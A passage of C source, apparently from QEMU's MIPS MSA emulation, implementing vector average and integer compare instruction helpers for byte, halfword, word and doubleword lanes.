msa_ave_s_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_ave_s_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_ave_s_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_ave_s_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_ave_s_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_ave_s_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_ave_s_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_ave_s_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_ave_s_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_ave_s_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_ave_s_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_ave_s_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_ave_s_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_ave_s_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_ave_s_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_ave_s_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_ave_s_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_ave_s_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_ave_s_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_ave_s_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline uint64_t msa_ave_u_df(uint32_t df, uint64_t arg1, uint64_t arg2) { uint64_t u_arg1 = UNSIGNED(arg1, df); uint64_t u_arg2 = UNSIGNED(arg2, df); /* unsigned shift */ return (u_arg1 >> 1) + (u_arg2 >> 1) + (u_arg1 & u_arg2 & 1); } void helper_msa_ave_u_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_ave_u_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_ave_u_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_ave_u_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_ave_u_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_ave_u_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_ave_u_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_ave_u_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_ave_u_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_ave_u_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_ave_u_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_ave_u_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_ave_u_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_ave_u_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_ave_u_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_ave_u_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_ave_u_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_ave_u_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_ave_u_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_ave_u_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_ave_u_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_ave_u_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_ave_u_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_ave_u_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_ave_u_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_ave_u_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_ave_u_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_ave_u_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_ave_u_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_ave_u_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_ave_u_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_ave_u_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_ave_u_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_ave_u_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_aver_s_df(uint32_t df, int64_t arg1, int64_t arg2) { /* signed shift */ return (arg1 >> 1) + (arg2 >> 1) + ((arg1 | arg2) & 1); } void helper_msa_aver_s_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_aver_s_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_aver_s_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_aver_s_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_aver_s_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_aver_s_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_aver_s_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_aver_s_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_aver_s_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_aver_s_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_aver_s_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_aver_s_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_aver_s_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_aver_s_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_aver_s_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_aver_s_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_aver_s_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_aver_s_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_aver_s_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_aver_s_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_aver_s_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_aver_s_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_aver_s_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_aver_s_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_aver_s_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_aver_s_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_aver_s_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_aver_s_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_aver_s_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_aver_s_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_aver_s_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_aver_s_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_aver_s_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_aver_s_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline uint64_t msa_aver_u_df(uint32_t df, uint64_t arg1, uint64_t arg2) { uint64_t u_arg1 = UNSIGNED(arg1, df); uint64_t u_arg2 = UNSIGNED(arg2, df); /* unsigned shift */ return (u_arg1 >> 1) + (u_arg2 >> 1) + ((u_arg1 | u_arg2) & 1); } void helper_msa_aver_u_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_aver_u_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_aver_u_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_aver_u_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_aver_u_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_aver_u_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_aver_u_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_aver_u_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_aver_u_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_aver_u_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_aver_u_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_aver_u_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_aver_u_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_aver_u_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_aver_u_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_aver_u_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_aver_u_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_aver_u_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_aver_u_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_aver_u_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_aver_u_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_aver_u_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_aver_u_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_aver_u_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_aver_u_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_aver_u_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_aver_u_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_aver_u_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_aver_u_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_aver_u_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_aver_u_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_aver_u_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_aver_u_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_aver_u_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } /* * Int Compare * ----------- * * +---------------+----------------------------------------------------------+ * | CEQ.B | Vector Compare Equal (byte) | * | CEQ.H | Vector Compare Equal (halfword) | * | CEQ.W | Vector Compare Equal (word) | * | CEQ.D | Vector Compare Equal (doubleword) | * | CLE_S.B | Vector Compare Signed Less Than or Equal (byte) | * | CLE_S.H | Vector Compare Signed Less Than or Equal (halfword) | * | CLE_S.W | Vector Compare Signed Less Than or Equal (word) | * | CLE_S.D | Vector Compare Signed Less Than or Equal (doubleword) | * | CLE_U.B | Vector Compare Unsigned Less Than or Equal (byte) | * | CLE_U.H | Vector Compare Unsigned Less Than or Equal (halfword) | * | CLE_U.W | Vector Compare Unsigned Less Than or Equal (word) | * | CLE_U.D | Vector Compare Unsigned Less Than or Equal (doubleword) | * | CLT_S.B | Vector Compare Signed Less Than (byte) | * | CLT_S.H | Vector Compare Signed Less Than (halfword) | * | CLT_S.W | Vector Compare Signed Less Than (word) | * | CLT_S.D | Vector Compare Signed Less Than (doubleword) | * | CLT_U.B | Vector Compare Unsigned Less Than (byte) | * | CLT_U.H | Vector Compare Unsigned Less Than (halfword) | * | CLT_U.W | Vector Compare Unsigned Less Than (word) | * | CLT_U.D | Vector Compare Unsigned Less Than (doubleword) | * +---------------+----------------------------------------------------------+ */ static inline int64_t msa_ceq_df(uint32_t df, int64_t arg1, int64_t arg2) { return arg1 == arg2 ? -1 : 0; } static inline int8_t msa_ceq_b(int8_t arg1, int8_t arg2) { return arg1 == arg2 ? -1 : 0; } void helper_msa_ceq_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_ceq_b(pws->b[0], pwt->b[0]); pwd->b[1] = msa_ceq_b(pws->b[1], pwt->b[1]); pwd->b[2] = msa_ceq_b(pws->b[2], pwt->b[2]); pwd->b[3] = msa_ceq_b(pws->b[3], pwt->b[3]); pwd->b[4] = msa_ceq_b(pws->b[4], pwt->b[4]); pwd->b[5] = msa_ceq_b(pws->b[5], pwt->b[5]); pwd->b[6] = msa_ceq_b(pws->b[6], pwt->b[6]); pwd->b[7] = msa_ceq_b(pws->b[7], pwt->b[7]); pwd->b[8] = msa_ceq_b(pws->b[8], pwt->b[8]); pwd->b[9] = msa_ceq_b(pws->b[9], pwt->b[9]); pwd->b[10] = msa_ceq_b(pws->b[10], pwt->b[10]); pwd->b[11] = msa_ceq_b(pws->b[11], pwt->b[11]); pwd->b[12] = msa_ceq_b(pws->b[12], pwt->b[12]); pwd->b[13] = msa_ceq_b(pws->b[13], pwt->b[13]); pwd->b[14] = msa_ceq_b(pws->b[14], pwt->b[14]); pwd->b[15] = msa_ceq_b(pws->b[15], pwt->b[15]); } static inline int16_t msa_ceq_h(int16_t arg1, int16_t arg2) { return arg1 == arg2 ? -1 : 0; } void helper_msa_ceq_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_ceq_h(pws->h[0], pwt->h[0]); pwd->h[1] = msa_ceq_h(pws->h[1], pwt->h[1]); pwd->h[2] = msa_ceq_h(pws->h[2], pwt->h[2]); pwd->h[3] = msa_ceq_h(pws->h[3], pwt->h[3]); pwd->h[4] = msa_ceq_h(pws->h[4], pwt->h[4]); pwd->h[5] = msa_ceq_h(pws->h[5], pwt->h[5]); pwd->h[6] = msa_ceq_h(pws->h[6], pwt->h[6]); pwd->h[7] = msa_ceq_h(pws->h[7], pwt->h[7]); } static inline int32_t msa_ceq_w(int32_t arg1, int32_t arg2) { return arg1 == arg2 ? -1 : 0; } void helper_msa_ceq_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_ceq_w(pws->w[0], pwt->w[0]); pwd->w[1] = msa_ceq_w(pws->w[1], pwt->w[1]); pwd->w[2] = msa_ceq_w(pws->w[2], pwt->w[2]); pwd->w[3] = msa_ceq_w(pws->w[3], pwt->w[3]); } static inline int64_t msa_ceq_d(int64_t arg1, int64_t arg2) { return arg1 == arg2 ? -1 : 0; } void helper_msa_ceq_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_ceq_d(pws->d[0], pwt->d[0]); pwd->d[1] = msa_ceq_d(pws->d[1], pwt->d[1]); } static inline int64_t msa_cle_s_df(uint32_t df, int64_t arg1, int64_t arg2) { return arg1 <= arg2 ? -1 : 0; } void helper_msa_cle_s_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_cle_s_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_cle_s_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_cle_s_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_cle_s_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_cle_s_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_cle_s_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_cle_s_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_cle_s_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_cle_s_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_cle_s_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_cle_s_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_cle_s_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_cle_s_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_cle_s_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_cle_s_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_cle_s_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_cle_s_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_cle_s_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_cle_s_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_cle_s_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_cle_s_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_cle_s_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_cle_s_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_cle_s_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_cle_s_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_cle_s_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_cle_s_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_cle_s_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_cle_s_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_cle_s_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_cle_s_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_cle_s_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_cle_s_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_cle_u_df(uint32_t df, int64_t arg1, int64_t arg2) { uint64_t u_arg1 = UNSIGNED(arg1, df); uint64_t u_arg2 = UNSIGNED(arg2, df); return u_arg1 <= u_arg2 ? -1 : 0; } void helper_msa_cle_u_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_cle_u_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_cle_u_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_cle_u_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_cle_u_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_cle_u_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_cle_u_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_cle_u_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_cle_u_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_cle_u_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_cle_u_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_cle_u_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_cle_u_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_cle_u_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_cle_u_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_cle_u_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_cle_u_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_cle_u_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_cle_u_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_cle_u_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_cle_u_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_cle_u_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_cle_u_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_cle_u_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_cle_u_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_cle_u_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_cle_u_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_cle_u_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_cle_u_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_cle_u_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_cle_u_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_cle_u_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_cle_u_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_cle_u_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_clt_s_df(uint32_t df, int64_t arg1, int64_t arg2) { return arg1 < arg2 ? -1 : 0; } static inline int8_t msa_clt_s_b(int8_t arg1, int8_t arg2) { return arg1 < arg2 ? -1 : 0; } void helper_msa_clt_s_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_clt_s_b(pws->b[0], pwt->b[0]); pwd->b[1] = msa_clt_s_b(pws->b[1], pwt->b[1]); pwd->b[2] = msa_clt_s_b(pws->b[2], pwt->b[2]); pwd->b[3] = msa_clt_s_b(pws->b[3], pwt->b[3]); pwd->b[4] = msa_clt_s_b(pws->b[4], pwt->b[4]); pwd->b[5] = msa_clt_s_b(pws->b[5], pwt->b[5]); pwd->b[6] = msa_clt_s_b(pws->b[6], pwt->b[6]); pwd->b[7] = msa_clt_s_b(pws->b[7], pwt->b[7]); pwd->b[8] = msa_clt_s_b(pws->b[8], pwt->b[8]); pwd->b[9] = msa_clt_s_b(pws->b[9], pwt->b[9]); pwd->b[10] = msa_clt_s_b(pws->b[10], pwt->b[10]); pwd->b[11] = msa_clt_s_b(pws->b[11], pwt->b[11]); pwd->b[12] = msa_clt_s_b(pws->b[12], pwt->b[12]); pwd->b[13] = msa_clt_s_b(pws->b[13], pwt->b[13]); pwd->b[14] = msa_clt_s_b(pws->b[14], pwt->b[14]); pwd->b[15] = msa_clt_s_b(pws->b[15], pwt->b[15]); } static inline int16_t msa_clt_s_h(int16_t arg1, int16_t arg2) { return arg1 < arg2 ? -1 : 0; } void helper_msa_clt_s_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_clt_s_h(pws->h[0], pwt->h[0]); pwd->h[1] = msa_clt_s_h(pws->h[1], pwt->h[1]); pwd->h[2] = msa_clt_s_h(pws->h[2], pwt->h[2]); pwd->h[3] = msa_clt_s_h(pws->h[3], pwt->h[3]); pwd->h[4] = msa_clt_s_h(pws->h[4], pwt->h[4]); pwd->h[5] = msa_clt_s_h(pws->h[5], pwt->h[5]); pwd->h[6] = msa_clt_s_h(pws->h[6], pwt->h[6]); pwd->h[7] = msa_clt_s_h(pws->h[7], pwt->h[7]); } static inline int32_t msa_clt_s_w(int32_t arg1, int32_t arg2) { return arg1 < arg2 ? -1 : 0; } void helper_msa_clt_s_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_clt_s_w(pws->w[0], pwt->w[0]); pwd->w[1] = msa_clt_s_w(pws->w[1], pwt->w[1]); pwd->w[2] = msa_clt_s_w(pws->w[2], pwt->w[2]); pwd->w[3] = msa_clt_s_w(pws->w[3], pwt->w[3]); } static inline int64_t msa_clt_s_d(int64_t arg1, int64_t arg2) { return arg1 < arg2 ? -1 : 